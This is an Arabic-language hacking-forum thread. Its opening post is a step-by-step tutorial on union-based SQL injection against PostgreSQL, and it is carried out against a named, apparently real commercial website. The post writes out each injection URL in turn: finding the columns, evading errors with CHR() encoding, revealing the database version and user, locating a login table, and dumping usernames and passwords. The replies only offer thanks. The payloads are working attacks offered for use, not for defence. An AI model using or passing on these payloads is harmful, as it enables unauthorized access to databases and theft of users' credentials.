1. CoBrA-M

    CoBrA-M Developer

    الأنتساب:
    ‏2 مايو 2014
    المشاركات:
    100
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    والصلاه والسلام على خاتم الانبياء والمرسلين سيدنا محمد وعلى آله وصحبه أجميعن

    [​IMG]

    [​IMG]

    معنا شرح بسيط حول PostgreSQL

    الي هو قاعدة من قواعدة البيانات النادرة جدا

    راح نتكلم على طريقة حقنه بطريقة union based

    وفي المرة الجاية راح يكون error based

    طبعا معانا هدف نطبق عليه :{5!}:

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1&page_prod_id=1
    الاعمدة 6
    في استعلام postgresql لازملنا شغلتين عشان نقدر نطلع العواميد المصابة
    اول شغلة استبدال المتغيرة بقيمة فارغة
    والشغلة الثانية تشفير الاعمدة تشفير اوراكل
    نشوف الاخطاء ونشوف كيف نتفداها

    لو يكون الاستعلام مبدئي مثل كل الاستعلامات راح يضهر لنا خطا


    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=1 and 1=1 union all select 1,2,3,4,5,6
    [​IMG]

    لو نستبدل المتغيرة بقيمة فارغة بدون تشفير اوراكل للاعمدة راح يبقى الخطا

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select 1,2,3,4,5,6
    [​IMG]

    لكن لو نشفر الاعمدة تشفير اوراكل بدون استبدال المتغيرة بقيمة فارغة راح يبقى الخطا

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=1 and 1=1 union all select  CHR(49), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54)
    [​IMG]

    هنا عرفنا انو الكل يرتبط ببعض مثل مايقولو

    الان نشفر الاعمدة تشفير اوراكل ونخلي المتغيرة فارغة راح تطلع الاعمدة

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  CHR(49), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54)
    [​IMG]

    الان نشوف معلومات حول القاعدة اصدارها و اسمها ويوزرها

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  current_user||CHR(58)||current_database()||CHR(58)||version()||CHR(58), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54)
    [​IMG]

    الان نطلب اي جدول فيه حقل pass
    وطبعا كلمت pass نشفرها اوراكل
    والتنقل يكون ب
    offset 1
    offset 2
    الى اخره


    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  table_name, CHR(50), CHR(51), CHR(52), CHR(53), CHR(54) from+information_schema.columns+where+column_name= CHR(112) || CHR(97) || CHR(115) || CHR(115) || CHR(119) || CHR(111) || CHR(114) || CHR(100) limit 1 offset 1
    [​IMG]

    تمام ظهر معانا جدول login نطلع حقوله لكن عشان تظهر الحقول لازم نشفره تشفير اوراكل

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  array_to_string(array_agg(column_name::XML),$$:$$), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54) from+information_schema.columns+where+table_name= CHR(108) || CHR(111) || CHR(103) || CHR(105) || CHR(110)
    [​IMG]

    الان ناتي لاخلاصة الموضوع :ُ7e@:

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  user_name||chr(58)||password, CHR(50), CHR(51), CHR(52), CHR(53), CHR(54) from+login
    [​IMG]

    [​IMG]
     
  2. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    احسنت
    شرح مبسط و مفيد

     
  3. ابو عبد السلام

    ابو عبد السلام Developer

    الأنتساب:
    ‏30 أكتوبر 2014
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    |[ Saudi Arabia ]|
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    ربي يعطيكـ العافيه \
     
  4. Dr.AnTi_HaCkEr

    Dr.AnTi_HaCkEr DeveloPer Plus

    الأنتساب:
    ‏8 مايو 2012
    المشاركات:
    103
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    يعطيك العافية وسلمت يداك
     
  5. MJHOoL-HKR

    MJHOoL-HKR Developer

    الأنتساب:
    ‏27 يوليو 2012
    المشاركات:
    2
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    private
    الإقامة:
    private
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    شكراً اخي بارك الله بجهوودك
     
  6. CoBrA-M

    CoBrA-M Developer

    الأنتساب:
    ‏2 مايو 2014
    المشاركات:
    100
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    منورين والله :ُeُe1!0:
     
  7. нαcĸ

    нαcĸ Developer

    الأنتساب:
    ‏4 يناير 2013
    المشاركات:
    58
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    يعطيك العافيه ما قصرت [​IMG]
     
  8. BEN LADEN _DZ

    BEN LADEN _DZ Developer

    الأنتساب:
    ‏10 يونيو 2012
    المشاركات:
    40
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    D_Z
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    موضوع جميل بارك الله فيك

    تسلم
     
  9. coiffa

    coiffa Developer

    الأنتساب:
    ‏1 يناير 2013
    المشاركات:
    41
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    برافو اخي يعطيك العافية وسلمت يداك
     
  10. Ĝυēναяα

    Ĝυēναяα Developer

    الأنتساب:
    ‏21 يونيو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    فلسطين
    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    ﭔآړﮗ آلْـلْـھ ڤـﭜﮗ :{1}:

    ۈآلْـلْـھ ﭜعطـﭜﮗ آلْـعآڤـﭜہ ً#ٌ5oًًًُ.
     

مشاركة هذه الصفحة